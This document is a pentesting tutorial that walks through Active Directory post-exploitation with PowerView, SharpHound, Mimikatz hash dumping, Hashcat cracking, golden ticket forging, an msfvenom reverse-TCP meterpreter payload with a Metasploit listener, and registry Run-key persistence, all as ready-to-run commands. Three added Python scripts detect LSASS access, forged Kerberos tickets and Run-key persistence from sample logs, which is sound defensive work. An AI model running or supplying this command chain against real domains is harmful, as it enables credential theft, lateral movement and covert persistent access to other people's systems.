After getting a foot in the door in a pentesting scenario or competition, it is time to gather more data and credentials and to create persistence:

  • PowerView – Enumerating the domain.
  • SharpHound – Hammering that DC to extract all available data.
  • BloodHound – Analysing the extracted data from the domain.
  • Mimikatz – Dumping hashes.
    • Hashcat – Cracking the dumped hashes.
    • Golden Ticket – Getting access to other machines.
  • Msfvenom – Crafting a payload.
  • Metasploit – Getting the reverse shell and creating persistence.

Enumerating the domain with the PowerShell script PowerView – Full command list available at [Link]:

powershell -ep bypass
. .\PATH\PowerView.ps1

Enumerate Domain Users

Get-NetUser | select cn

Enumerate Computers

Get-NetComputer -fulldata | select operatingsystem

Enumerate Groups

Get-NetGroup -GroupName *admin*

Enumerate Shares

Invoke-ShareFinder

Extract the loot from any computer joined to the domain with the SharpHound script:

powershell -ep bypass
. .\PATH\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain DOMAIN.local -ZipFileName loot.zip

Copy the file over to the attacker’s machine.


Explore the domain with BloodHound. Neo4j is just the database used by BloodHound.

Installing the tool on the attacker machine:

sudo apt install bloodhound neo4j -y
sudo neo4j console

The default credentials for the database are neo4j:neo4j. Navigate to http://localhost:7474/ and change the default password.

Then execute the BloodHound application:

bloodhound

Click on the import button or simply drag and drop the .zip file.

On the left menu, look for Queries / Analysis.


Dumping hashes with Mimikatz:

mimikatz.exe
privilege::debug
lsadump::lsa /patch
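From the defender's side, credential dumping of this kind shows up as a process opening a handle to lsass.exe with memory-read rights. The script below is an added example, not code from this page or from the Mimikatz project: it parses constructed Sysmon Event ID 10 (ProcessAccess) records, condensed here to one key=value line each, and reports any process outside an assumed allowlist that obtained PROCESS_VM_READ, PROCESS_VM_WRITE or PROCESS_VM_OPERATION access to LSASS. The sample lines and the allowlist are assumptions for the demo.

```python
import re

# Constructed Sysmon Event ID 10 (ProcessAccess) records for the demo, one key=value line each.
# Real Sysmon data is XML in the Microsoft-Windows-Sysmon/Operational log; these lines are made up.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\csrss.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Users\alice\Desktop\mimikatz.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1010",
    r"EventID=10 SourceImage=C:\Windows\Temp\svc.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410",
    r"EventID=10 SourceImage=C:\Windows\explorer.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1000",
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe",
]

# Access-mask bits that allow reading or writing another process's memory (from winnt.h).
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
MEMORY_ACCESS = PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Assumed allowlist of processes that legitimately open LSASS on most hosts; tune it per environment.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Key=value pairs; a value runs until the next " Key=" or the end of the line, so paths may contain spaces.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Turn a 'Key=value Key=value' record into a dict."""
    return dict(FIELD_RE.findall(line))


def suspicious_lsass_access(lines):
    """Return (source_image, granted_access) for each non-allowlisted process that
    obtained memory-read or memory-write rights on lsass.exe."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "10":
            continue
        if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
            continue
        access = int(ev.get("GrantedAccess", "0"), 16)
        if not access & MEMORY_ACCESS:
            continue
        source = ev.get("SourceImage", "")
        if source.lower() in ALLOWLIST:
            continue
        hits.append((source, f"0x{access:X}"))
    return hits


if __name__ == "__main__":
    for source, access in suspicious_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT: {source} opened LSASS with access {access}")
```

The access masks 0x1010 and 0x1410 are the ones most often seen from credential-dumping tools, but filtering on the memory bits rather than exact masks is more robust. The allowlist is what needs care in practice: security products and a few OS components open LSASS legitimately, so build it from a baseline of the environment rather than from this sample.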

Cracking the dumped hashes with Hashcat (mode 1000 is NTLM):

hashcat -m 1000 hashes.lst /usr/share/wordlists/rockyou.txt

Creating a Golden Ticket with Mimikatz:

lsadump::lsa /inject /name:userName
kerberos::golden /user:administrator /domain:domain.local /sid:S-3-5-41-845420856-2351964987-986696098 /userName:5508500012cc005cf7082a9a89ebdfdf /id:500
misc::cmd

Getting access to other machines with the Golden Ticket in the newly opened window:

dir \\ComputerA\c$
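A forged TGT never passes through the KDC's authentication service, so on the domain controllers the trace is a service-ticket request (Event ID 4769) for an account with no preceding TGT request (Event ID 4768) from that client, and, with the default options used above, a ticket encrypted with RC4-HMAC (encryption type 0x17) in a domain that otherwise negotiates AES. The script below is an added example, not code from this page or from Mimikatz: it runs those two checks over constructed event records whose field names follow the Windows security log but whose timestamps, accounts and addresses are made up.

```python
import re
from datetime import datetime, timedelta

# Default TGT lifetime from the domain Kerberos policy; set it to the environment's real value.
TGT_LIFETIME = timedelta(hours=10)
RC4_HMAC = 0x17  # Ticket Encryption Type for RC4-HMAC; AES128 is 0x11, AES256 is 0x12

# Constructed domain-controller security events (4768 = TGT requested, 4769 = service ticket
# requested), condensed to one key=value line each. Field names follow the Windows log; the
# values are invented for the demo.
SAMPLE_EVENTS = [
    "Time=2024-05-01T08:00:00 EventID=4768 TargetUserName=bob IpAddress=10.10.10.5 TicketEncryptionType=0x12",
    "Time=2024-05-01T08:00:02 EventID=4769 TargetUserName=bob@DOMAIN.LOCAL ServiceName=cifs/ComputerA IpAddress=10.10.10.5 TicketEncryptionType=0x12",
    "Time=2024-05-01T09:15:00 EventID=4769 TargetUserName=administrator@DOMAIN.LOCAL ServiceName=cifs/ComputerA IpAddress=10.10.10.77 TicketEncryptionType=0x17",
    "Time=2024-05-01T09:16:00 EventID=4769 TargetUserName=administrator@DOMAIN.LOCAL ServiceName=ldap/DC01 IpAddress=10.10.10.77 TicketEncryptionType=0x12",
]

FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Turn a 'Key=value Key=value' record into a dict."""
    return dict(FIELD_RE.findall(line))


def forged_tgt_indicators(lines):
    """Return (account, client, service, reasons) for each service-ticket request that
    either uses RC4 or has no TGT request from the same client within TGT_LIFETIME.
    Events must be in chronological order."""
    last_tgt = {}  # (account, client) -> time of the most recent 4768
    findings = []
    for line in lines:
        ev = parse_event(line)
        when = datetime.fromisoformat(ev["Time"])
        # 4769 carries user@REALM, 4768 carries the bare name; normalise both to the bare name.
        account = ev["TargetUserName"].split("@", 1)[0].lower()
        client = ev["IpAddress"]
        if ev["EventID"] == "4768":
            last_tgt[(account, client)] = when
            continue
        if ev["EventID"] != "4769":
            continue
        reasons = []
        if int(ev["TicketEncryptionType"], 16) == RC4_HMAC:
            reasons.append("rc4_service_ticket")
        issued = last_tgt.get((account, client))
        if issued is None or when - issued > TGT_LIFETIME:
            reasons.append("no_tgt_request_from_client")
        if reasons:
            findings.append((account, client, ev.get("ServiceName", ""), reasons))
    return findings


if __name__ == "__main__":
    for account, client, service, reasons in forged_tgt_indicators(SAMPLE_EVENTS):
        print(f"ALERT: {account} from {client} -> {service}: {', '.join(reasons)}")
```

In production the 4768 lookup has to be joined across every domain controller, because the TGT may have been issued by a different DC than the one serving the TGS request, and TGT_LIFETIME must match the domain policy. The encryption-type check is a heuristic on its own: legacy accounts may still negotiate RC4 legitimately, so it is the combination with the missing 4768 that is worth alerting on. The lasting remediation for a compromised krbtgt key is to reset the krbtgt password twice, allowing replication to complete between the two resets, which invalidates tickets signed with the old key.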

CREATING PERSISTENCE

Crafting a payload with Msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.99 LPORT=4444 -f exe -o shell.exe

On the attacker side, start a listener with Metasploit – Module Library available at [Link]:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run
background

Applying persistence to the granted session with the Persistent Registry Startup Payload Installer module:

use exploit/windows/local/persistence
sessions
set session 1

See also exploit/windows/local/persistence_service, the Persistent Service Installer.
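To find Run-key persistence of this kind after the fact, export the Run keys and look for entries that launch a script host or start something from a user-writable location. The audit below is an added example, not code from this page or from Metasploit: it parses a constructed .reg export of the HKCU and HKLM Run keys (the entry names and paths are made up) and returns every entry that matches either heuristic.

```python
import re

# Constructed .reg export of the per-user and machine-wide Run keys; the entries, names and
# paths are invented for the demo and do not describe any particular host.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"UpdateCheck"="wscript.exe //B C:\\Users\\alice\\AppData\\Local\\Temp\\jYdKfN.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"svchost"="C:\\Windows\\Temp\\shell.exe"
"""

# Heuristics (assumed; tune per environment): directories any user can write to, and
# script/host binaries that a normal installer rarely registers under a Run key.
USER_WRITABLE_DIRS = ("\\temp\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_HOSTS = {"wscript", "cscript", "mshta", "powershell", "regsvr32", "rundll32"}
RUN_KEY_MARKER = "\\currentversion\\run"  # also matches RunOnce

# A .reg string value line: "name"="data", where backslash and quote are escaped with a backslash.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def reg_unescape(s):
    # Undo .reg escaping in one pass: a backslash followed by any character yields that character.
    return re.sub(r"\\(.)", r"\1", s)


def parse_run_entries(reg_text):
    """Yield (key, value_name, command) for every string value under a Run/RunOnce key."""
    key = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        if key is None or RUN_KEY_MARKER not in key.lower():
            continue
        m = VALUE_RE.match(line)
        if m:
            yield key, reg_unescape(m.group(1)), reg_unescape(m.group(2))


def launcher_name(command):
    """Base name, without extension, of the program a command line starts (quoted or not)."""
    cmd = command.strip()
    if cmd.startswith('"'):
        token = cmd[1:].split('"', 1)[0]
    else:
        token = cmd.split(None, 1)[0] if cmd else ""
    return token.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].split(".")[0].lower()


def audit_autoruns(reg_text):
    """Return (key, value_name, reasons) for each Run entry matching at least one heuristic."""
    findings = []
    for key, name, command in parse_run_entries(reg_text):
        cmd = command.lower()
        reasons = []
        if any(d in cmd for d in USER_WRITABLE_DIRS):
            reasons.append("user_writable_path")
        if launcher_name(cmd) in SCRIPT_HOSTS:
            reasons.append("script_host_launcher")
        if reasons:
            findings.append((key, name, reasons))
    return findings


if __name__ == "__main__":
    for key, name, reasons in audit_autoruns(SAMPLE_REG_EXPORT):
        print(f"{key}\\{name}: {', '.join(reasons)}")
```

The same two checks work as a real-time rule over Sysmon Event ID 12/13 (registry object added / value set) events on the Run keys, which catches the entry at the moment it is written instead of at the next audit. The persistence_service variant mentioned above leaves a new service rather than a Run entry, so the ImagePath values under HKLM\SYSTEM\CurrentControlSet\Services deserve the same path heuristic.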